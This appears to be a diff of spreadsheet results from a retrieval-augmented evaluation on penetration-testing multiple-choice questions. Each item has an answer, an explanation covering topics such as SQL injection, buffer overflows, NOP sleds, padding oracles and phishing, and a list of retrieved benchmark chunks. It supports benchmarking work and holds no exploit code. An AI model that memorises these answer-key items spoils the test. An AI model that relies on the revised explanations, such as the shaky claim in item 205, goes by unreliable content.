       <c r="J195" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K195" t="inlineStr">
         <is>
@@ -13594,7 +12595,7 @@
       <c r="F196" t="inlineStr">
         <is>
           <t>Answer: Implement side-channel attack through SQL timing differences
-Explanation: The correct answer is 'Implement side-channel attack through SQL timing differences'. This technique involves measuring how long it takes for the database to respond to various queries. By analyzing the time differences, an attacker can infer information about the database or formulate efficient attack strategies. Option 0, 'Using an HTTP GET request to trigger buffer overflow vulnerabilities', is a plausible technique, but it does not pertain to identifying timing vectors as it is primarily geared towards exploiting memory corruption issues. Option 1, 'Exploiting SQL injection flaws using INPUT method instead of POST or GET', is incorrect as SQL injection involves incorrect handling of user inputs primarily via SQL queries and the INPUT method is not recognized in HTTP standards. Finally, option 3, 'Leveraging CSRF tokens to bypass authentication controls', involves session riding and does not help in identifying timing attack vectors either.</t>
+Explanation: In a red team operation, implementing a side-channel attack through SQL timing differences would be the most effective method for identifying timing attack vectors in a web application's database interaction. This type of attack exploits variations in response times from the database server to gather information about the system and potentially extract sensitive data. The other options do not directly address timing attacks or are less efficient methods for this specific context.</t>
         </is>
       </c>
       <c r="G196" t="inlineStr">
@@ -13608,21 +12609,16 @@
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9de1e388-e5f2-4d4a-ae47-ac3a137f820e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b0a2fbea-59dd-4895-a643-c4597f5aa857, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I196" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J196" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K196" t="inlineStr">
         <is>
@@ -13661,7 +12657,7 @@
       <c r="F197" t="inlineStr">
         <is>
           <t>Answer: SQL injection in user inputs
-Explanation: The most effective technique to exploit a web application to gain access to the backend database is SQL injection. This attack involves inserting malicious SQL statements into entry fields for execution (e.g., to dump database contents to the attacker). Buffer overflow exploits, while serious, are generally related to overflow conditions in application memory space rather than database access specifically. Brute-force attacks on encrypted files are unrelated to direct database access through a web application. Cross-site scripting (XSS) is primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario.</t>
+Explanation: The most effective technique to exploit a web application to gain access to the backend database is SQL injection. This attack involves the insertion of malicious SQL statements into entry fields for execution (e.g., to dump database contents to the attacker). Buffer overflow exploits, while serious, are generally related to overflow conditions in application memory space rather than database access specifically. Brute-force attacks on encrypted files are unrelated to direct database access through a web application. Cross-site scripting (XSS) is primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario.</t>
         </is>
       </c>
       <c r="G197" t="inlineStr">
@@ -13675,21 +12671,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I197" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J197" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K197" t="inlineStr">
         <is>
@@ -13728,7 +12719,7 @@
       <c r="F198" t="inlineStr">
         <is>
           <t>Answer: Exploiting buffer overflow vulnerabilities to execute arbitrary code
-Explanation: In the context of a red team exercise, exploiting buffer overflow vulnerabilities is often the most effective technique for gaining remote code execution on a target's backend server. Buffer overflow vulnerabilities occur due to poor memory management and allow attackers to overwrite memory segments of a server, potentially leading to remote code execution. This technique is particularly effective against servers running legacy software that might not have modern protections like ASLR or DEP. The other choices, while valid cybersecurity threats, are less likely to achieve remote code execution directly in this specific scenario.</t>
+Explanation: In the context of a red team exercise, exploiting buffer overflow vulnerabilities is often the most effective technique for gaining remote code execution on a target's backend server. Buffer overflow exploits take advantage of programming errors in software that do not properly manage memory allocation. When a server is poorly patched or running legacy software with poor memory management practices, these vulnerabilities can be exploited to execute arbitrary code and gain access to the system. While social engineering, SQL injection, and DDoS attacks can also be effective techniques, they are less likely to directly lead to remote code execution in this specific scenario.</t>
         </is>
       </c>
       <c r="G198" t="inlineStr">
@@ -13742,21 +12733,16 @@
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1757437a-60fa-4600-b485-c0b3a0a51e87, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I198" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J198" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K198" t="inlineStr">
         <is>
@@ -13795,7 +12781,7 @@
       <c r="F199" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the application with both generic and custom payloads
-Explanation: Fuzzing the application with both generic and custom payloads is the most effective method for identifying unknown vulnerabilities in a custom-built enterprise application. Fuzzing involves sending unexpected, randomized, or malformed data to the application's inputs in order to trigger a fault, exception, or unexpected behavior that might indicate a vulnerability. This technique is specifically suited for discovering vulnerabilities, does not allow interaction during exploitation phases, and is more effective than automated vulnerability scanning, static code analysis tools, or machine learning models in this context.</t>
+Explanation: Fuzzing the application with both generic and custom payloads is the most effective method for identifying unknown vulnerabilities or bugs in a custom-built enterprise application. This technique involves sending unexpected, randomized, or malformed data to the application's inputs in order to trigger a fault, exception, or unexpected behavior that might indicate a vulnerability. Fuzzing is specifically suited for discovering vulnerabilities in custom applications because it does not rely on known vulnerabilities and can find issues that may have been missed during development or testing. The other options, while useful in different contexts, are less effective for identifying unknown vulnerabilities in custom-built enterprise applications.</t>
         </is>
       </c>
       <c r="G199" t="inlineStr">
@@ -13809,21 +12795,16 @@
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 1bf7372e-dcae-42ee-a9d9-0b1222053518, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I199" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J199" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K199" t="inlineStr">
         <is>
@@ -13876,21 +12857,16 @@
 preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1d9c2c29-6258-4807-8e78-b88b13c24f33, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I200" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J200" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K200" t="inlineStr">
         <is>
@@ -13929,7 +12905,7 @@
       <c r="F201" t="inlineStr">
         <is>
           <t>Answer: Padding Oracle Attack
-Explanation: The Padding Oracle Attack exploits the error information given by secure communication protocols during the decryption process to reveal details about the original plaintext. This type of attack specifically targets the implementation flaws in the padding of encrypted data blocks and uses the resultant error messages to infer the plaintext. Man-in-the-Middle Attack involves intercepting communications between two parties without their knowledge, but does not directly exploit error messages in cryptographic operations. Cross-Site Scripting (XSS) and SQL Injection are attacks that target web applications, exploiting vulnerabilities in input handling to inject malicious scripts or SQL queries, respectively, which are unrelated to cryptographic feedback as used in a Padding Oracle Attack.</t>
+Explanation: A Padding Oracle Attack exploits the error information given by secure communication protocols during the decryption process to reveal details about the original plaintext. This type of attack specifically targets the implementation flaws in the padding of encrypted data blocks and uses the resultant error messages to infer the plaintext. Man-in-the-Middle Attack involves intercepting communications between two parties without their knowledge, but does not directly exploit error messages in cryptographic operations. Cross-Site Scripting (XSS) and SQL Injection are attacks that target web applications, exploiting vulnerabilities in input handling to inject malicious scripts or SQL queries, respectively, which are unrelated to cryptographic feedback as used in a Padding Oracle Attack.</t>
         </is>
       </c>
       <c r="G201" t="inlineStr">
@@ -13943,21 +12919,16 @@
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 8)
-cowWhySo-pentest-redteam-steering.md (Chunk: d910beef-14dc-4c05-b3d9-2938a3f085fa, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I201" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J201" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K201" t="inlineStr">
         <is>
@@ -14007,24 +12978,19 @@
       <c r="H202" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 9388f2c2-3f20-4989-a7c4-7cdc85cb53d9, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 87048b29-953d-48db-b238-14fcc81ffe15, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 7)
-4.Post-Exploitation_readme.md (Chunk: 8ce27f0e-817a-49c5-abda-2a4fd3b76c89, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I202" t="inlineStr">
         <is>
-          <t>Semantic: 4, Keyword: 6, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J202" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K202" t="inlineStr">
         <is>
@@ -14063,7 +13029,7 @@
       <c r="F203" t="inlineStr">
         <is>
           <t>Answer: Using a multi-staged payload delivery
-Explanation: In the context of red team operations, especially against well-defended targets like a corporate network, the goal is to simulate advanced persistent threats that aim for stealth and longevity in their access. A multi-staged payload delivery allows the red team operator to execute commands and control the target system remotely while maintaining a low profile, which is critical in avoiding detection. While brute-forcing administrative credentials can provide initial access, it is noisy and likely to trigger account lockouts and alerts. Performing a DDoS attack would draw attention and disrupt services but does not facilitate long-term network access. Manipulating service configuration files may be useful for lateral movement or privilege escalation but does not inherently provide the stealth and persistence needed for long-term operations.</t>
+Explanation: In the context of red team operations, especially against a well-defended target like a corporate network, the goal is to simulate advanced persistent threats that aim for stealth and longevity in their access. A multi-staged payload delivery technique involves breaking down the attack into multiple stages, each with its own purpose and function. This method allows the red team operator to avoid detection by limiting the scope of each stage and making it harder for security systems to identify the entire attack chain. By using a multi-staged payload delivery, the red team can maintain long-term access without immediate detection.</t>
         </is>
       </c>
       <c r="G203" t="inlineStr">
@@ -14077,21 +13043,16 @@
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I203" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J203" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K203" t="inlineStr">
         <is>
@@ -14131,7 +13092,7 @@
         <is>
           <t>Answer: Modification of conditional jumps in assembly
 Explanation: The most effective technique for bypassing a conditional check in malware assembly code, especially those that prevent debugging, is the modification of conditional jumps. By directly altering the conditional jumps in the malware's assembly code (such as changing 'JE' to 'JNE'), a reverse engineer can force the execution flow to bypass anti-debugging checks. This approach is specifically suitable for compiled languages like C++ where the conditional logic at the assembly level can often be identified and manipulated.
-'Python bytecode modification' is irrelevant since the malware is written in C++, not Python. 'Automated fuzzing with AFL' is primarily used for discovering vulnerabilities in software through automated input testing, which does not directly apply to debugging or reverse engineering a conditional check. 'Kernel exploitation using buffer overflow' refers to exploiting kernel-level vulnerabilities, not reverse engineering or debugging user-level application code.</t>
+Python bytecode modification is irrelevant since the malware is written in C++, not Python. Automated fuzzing with AFL is primarily used for discovering vulnerabilities in software through automated input testing, which does not directly apply to debugging or reverse engineering a conditional check. Kernel exploitation using buffer overflow refers to exploiting kernel-level vulnerabilities, not reverse engineering or debugging user-level application code.</t>
         </is>
       </c>
       <c r="G204" t="inlineStr">
@@ -14145,21 +13106,16 @@
 preemware_pentestingeval.pdf (Chunk: 886c0100-4171-4d07-9b3c-7a8a56badd8f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I204" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J204" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K204" t="inlineStr">
         <is>
@@ -14197,8 +13153,8 @@
       </c>
       <c r="F205" t="inlineStr">
         <is>
-          <t>Answer: Execution of a carefully timed man-in-the-middle attack to intercept data transfers
-Explanation: Execution of a carefully timed man-in-the-middle (MiTM) attack to intercept data transfers might be the least detectable by sophisticated security systems when executed properly. This is because MiTM attacks involve intercepting and modifying data in transit, which can be done at specific times or under certain conditions that are difficult for monitoring systems to detect. The other options are more likely to raise alarms or be detected: banner grabbing with default settings may trigger intrusion detection systems, attempting to exploit a known vulnerable service without reconnaissance is inefficient and likely to fail, and using social engineering tactics without prior investigation or pretext development can lead to unsuccessful attempts or alerting the target.</t>
+          <t>Answer: Using social engineering tactics without prior investigation or pretext development
+Explanation: In a red team engagement, the least likely technique to raise alarms or be detected by sophisticated security monitoring systems is using social engineering tactics without prior investigation or pretext development. Social engineering relies on human interaction and psychological manipulation rather than direct technical exploitation, making it less likely to trigger traditional intrusion detection systems. While banner grabbing and attempting to exploit a known vulnerable service may be detected by IDS, the execution of a carefully timed man-in-the-middle attack can still raise alarms if not executed properly or at the right time.</t>
         </is>
       </c>
       <c r="G205" t="inlineStr">
@@ -14212,21 +13168,16 @@
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a50681c0-06cb-4ca1-821f-95ab56a6e118, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7ff70824-6194-4554-86fe-63aa3ae35f19, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a50681c0-06cb-4ca1-821f-95ab56a6e118, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I205" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J205" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K205" t="inlineStr">
         <is>
@@ -14265,7 +13216,7 @@
       <c r="F206" t="inlineStr">
         <is>
           <t>Answer: Using a NOP sled to ensure reliable code execution following a buffer overflow
-Explanation: A NOP sled, consisting of a series of 'no operation' instructions, is used in exploit development to increase the chances of successfully executing malicious shellcode after a buffer overflow by 'sliding' the processor's instruction pointer into the shellcode regardless of small variations in memory layout or where the buffer begins. Option 1 is correct because it directly addresses a common issue in delivering and executing shellcode in exploit development-variability in the exact location of the buffer in memory across different systems and configurations. Option 2, while useful for evading some types of detection, does not directly contribute to execution reliability. Option 3, deploying a rootkit, is more related to maintaining persistence on an infected system rather than ensuring successful code execution during exploitation. Option 4, scattering unused byte sequences in the exploit payload, may confuse certain defense mechanisms but does not inherently facilitate reliable shellcode execution following a buffer overflow.</t>
+Explanation: A NOP sled, consisting of a series of 'no operation' instructions, is used in exploit development to increase the chances of successfully executing malicious shellcode after a buffer overflow by 'sliding' the processor's instruction pointer into the shellcode regardless of small variations in memory layout or where the buffer begins. Option 1 is correct because it directly addresses a common issue in delivering and executing shellcode in exploit development-variability in the exact location of the buffer in memory across different systems and configurations. Option 2, while useful for evading some types of detection, does not directly inherently facilitate persistence on the host. Option 3, deploying a rootkit, is more relevant to maintaining access after an initial exploit rather than ensuring successful execution of shellcode.</t>
         </is>
       </c>
       <c r="G206" t="inlineStr">
@@ -14279,21 +13230,16 @@
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 9)
-return-to-libc.md (Chunk: 88bba896-cf55-4993-82d3-104c0c450d86, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I206" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J206" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K206" t="inlineStr">
         <is>
@@ -14332,7 +13278,7 @@
       <c r="F207" t="inlineStr">
         <is>
           <t>Answer: Password phishing attacks on company employees
-Explanation: In the context of red team operations, password phishing attacks on company employees are often the most effective tactic for gaining initial access to a target's internal network. This approach leverages social engineering techniques to trick employees into revealing their login credentials, which can then be used to gain unauthorized access to the network. While scanning open ports and identifying services running with those ports (Option 1) can provide valuable information about potential vulnerabilities, it does not directly lead to initial access. Man-in-the-middle attacks on network traffic to steal credentials (Option 2) are more complex and may not be as effective in all situations. Deploying a network sniffer to capture unencrypted web traffic (Option 3) can provide useful information but does not guarantee access.</t>
+Explanation: In the context of red team operations, password phishing is often the most effective initial tactic for gaining access to a target's internal network. This method involves sending deceptive emails or messages that appear to come from a legitimate source, requesting users to reveal their login credentials. Once attackers obtain these credentials, they can use them to gain access to the target's internal network resources. While scanning open ports and identifying services running with those ports, man-in-the-middle attacks, and deploying a network sniffer are all valid tactics in penetration testing, password phishing is generally more effective for initial access as it relies on human behavior rather than technical vulnerabilities.</t>
         </is>
       </c>
       <c r="G207" t="inlineStr">
@@ -14346,21 +13292,16 @@
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 6)
